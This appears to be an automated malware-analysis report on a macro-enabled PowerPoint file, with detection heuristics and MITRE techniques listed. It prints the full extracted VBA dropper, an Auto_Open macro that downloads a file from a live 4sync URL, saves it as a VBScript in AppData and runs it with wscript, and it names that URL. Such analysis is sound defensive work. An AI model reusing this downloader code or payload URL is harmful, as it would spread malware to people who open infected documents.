MALICIOUS
198
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The VBA macro within the OOXML document contains a critical heuristic for downloading a file via HTTP and saving it to disk. It constructs the full URL "https://dc439.4sync.com/download/T86wExU6/hackfree.png?dsid=-oCzo6PE.ab4133c97e02d20c8aeda270d53fbce5&sbsr=75dcca5d70d73ca76803204f7d0429a7a77&bip=MTkxLjQ0LjkxLjI0NA&lgfp=40" and saves the response as "%APPDATA%/VVVVVVVVVVVVVVVVVVVV.vbs". The script then executes this downloaded VBScript using "wscript %APPDATA%/VVVVVVVVVVVVVVVVVVVV.vbs", indicating a downloader or dropper functionality.
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "wscript " & UUUUUUUUUU & "/VVVVVVVVVVVVVVVVVVVV.vbs", vbNormalFocus -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.write BBBBBBBBBBBBBBBBBBBBBBB.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim BBBBBBBBBBBBBBBBBBBBBBB: Set BBBBBBBBBBBBBBBBBBBBBBB = CreateObject("Microsoft.XMLHTTP") -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Public Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
UUUUUUUUUU = Environ("AppDATA") -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://dc439.4sync.com/download/T86wExU6/hackfree.png?dsid=-oCzo6PE.ab4133c97e02d20c8aeda270d53fbce5&sbsr=75dcca5d70d73ca76803204f7d0429a7a77&bip=MTkxLjQ0LjkxLjI0NA&lgfp=40 Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1202 bytes |
SHA-256: a3d908e0013ed29f5e5725cf59acb5cb0854b0a4beb966f8a06a4d5ed94442ef |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Public Sub Auto_Open()
Dim BBBBBBBBBBBBBBBBBBBBBBB: Set BBBBBBBBBBBBBBBBBBBBBBB = CreateObject("Microsoft.XMLHTTP")
Dim BBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCC: Set BBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCC = CreateObject("Adodb.Stream")
BBBBBBBBBBBBBBBBBBBBBBB.Open "GET", "https://dc439.4sync.com/download/T86wExU6/hackfree.png?dsid=-oCzo6PE.ab4133c97e02d20c8aeda270d53fbce5&sbsr=75dcca5d70d73ca76803204f7d0429a7a77&bip=MTkxLjQ0LjkxLjI0NA&lgfp=40", False
BBBBBBBBBBBBBBBBBBBBBBB.Send
Dim UUUUUUUUUU As String
UUUUUUUUUU = Environ("AppDATA")
With BBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCC
.Type = 1
.Open
.write BBBBBBBBBBBBBBBBBBBBBBB.responseBody
.savetofile UUUUUUUUUU & "/VVVVVVVVVVVVVVVVVVVV.vbs", 2 '//overwrite
End With
Shell "wscript " & UUUUUUUUUU & "/VVVVVVVVVVVVVVVVVVVV.vbs", vbNormalFocus
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{23E13D1A-31BA-4512-AD28-DB84074F795A}{9422184F-B531-434B-A837-22B28B90E27B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 1025536 bytes |
SHA-256: 982c039c36c8abd72fb8582308e32d9c7c6b8d07a5f5015dde5fcf01bb77a829 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.